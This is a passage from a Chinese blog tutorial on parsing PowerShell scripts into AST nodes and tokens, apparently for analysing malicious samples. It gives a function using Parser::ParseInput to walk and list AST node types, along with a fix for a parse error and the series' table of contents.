最终输出结果如下图所示：

在这里插入图片描述

同时存储至本地。

在这里插入图片描述

注意，利用上述代码在对PS文件解析时，可能会报错误。查了很多资料都无解决方法。

表达式或语句中包含意外的标记
CategoryInfo : NotSpecified: ( : ) [], MethodInvocationException

在这里插入图片描述

最后解决发现：是Create会解析Powershell代码，保证其无语法错误才创建代码块。这里使用另一种方法替换，即：

https://stackoverflow.com/questions/39909021/parsing-powershell-script-with-ast

$code = [Management.Automation.Language.Parser]::ParseInput($content, [ref]$tokens, [ref]$errors)

完整代码如下：

function Convert-CodeToAst
{
  param
  (
    [Parameter(Mandatory)]   # 强制参数
    [System.String]$str      # 执行ps文件名称
  )

  # 构建hashtable
  $hierarchy = @{}
  $result = [System.Collections.ArrayList]@()

  # 提取ps文件中的内容 
  Write-Output ("file name: {0}" -f ($str))
  $content = Get-content $str
  Write-Output $content

  # 创建Scipt代码块
  # 报错：表达式或语句中包含意外的标记
  # 原因：Create需要保证PS代码正确
  # $code = [ScriptBlock]::Create($content)

  $tokens = $null
  $errors = $null
  $code = [Management.Automation.Language.Parser]::ParseInput($content, [ref]$tokens, [ref]$errors)


  Write-Output $code

  # 提取AST
  $code.FindAll( { $true }, $true) |
  ForEach-Object {
    # take unique object hash as key
    $id = 0;
    if($_.Parent) {
      $id = $_.Parent.GetHashCode()
    }
    Write-Debug('{0}:{1}' -f $_.GetType().Name,$id)

    if ($hierarchy.ContainsKey($id) -eq $false) {
      $hierarchy[$id] = [System.Collections.ArrayList]@()
    }
    $null = $hierarchy[$id].Add($_)
    # add ast object to parent
  }
  
  # 递归可视化树
  function Visualize-Tree($Id)
  {
    # 每级缩进
    $hierarchy[$id] | ForEach-Object {
      # 获取当前AST对象的id
      $newid = $_.GetHashCode()

      # 递归其子节点（if any)
      if ($hierarchy.ContainsKey($newid))
      {
        Visualize-Tree -id $newid
      }
      $null = $result.Add($_.GetType().Name)
    }
  }

  # 使用AST根对象开始可视化
  Visualize-Tree -id $code.GetHashCode()
  Write-Output $result
  return $result
}

Convert-CodeToAst -str .\data\beacon

六.总结

写到这里这篇文章就介绍介绍，希望对您有所帮助。

一.Powershell基础知识
1.高威胁
2.基础语法
3.Bypass
二.powershell.one
1.概念
2.访问AST
三.Tokenizing PowerShell Scripts
1.Token多彩的世界
2.PSParser 概述
3.Tokenizing PowerShell
四.Token提取实例
1.基础用法
(1) 提取AST
(2) 提取Token
(3) 提取变量和命令列表
2.批量分析
3.提取token对应的text
五.自动提取Powershell的AST和Token实例
六.总结